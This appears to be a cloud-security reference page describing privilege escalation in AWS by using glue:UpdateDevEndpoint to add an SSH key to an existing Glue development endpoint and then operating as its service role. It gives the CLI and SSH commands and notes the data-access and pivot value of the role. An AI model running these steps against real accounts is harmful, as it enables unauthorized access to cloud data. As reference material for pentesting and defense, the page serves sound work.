UpdateDevEndpoint

A Glue development endpoint is a long-lived instance that runs with a Glue service role. glue:UpdateDevEndpoint lets you add an SSH public key to an existing endpoint, then you SSH in and operate as the role, no PassRole required.

Add your key and connect#

bash
aws glue update-dev-endpoint --endpoint-name <endpoint> \
  --add-public-keys "$(cat ~/.ssh/id_ed25519.pub)"
# then SSH to the endpoint's public address as the glue user
ssh glue@<endpoint-address>
#   aws sts get-caller-identity   (runs as the Glue role)

Exploitation notes#

  • The endpoint must already exist; this is the update variant of the Glue PassRole creation path.
  • Glue service roles frequently carry broad S3 and Data Catalog access, so the shell is a strong data-access and pivot position.

Tools#

  • AWS CLI (glue update-dev-endpoint).
  • Pacu: Glue modules.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more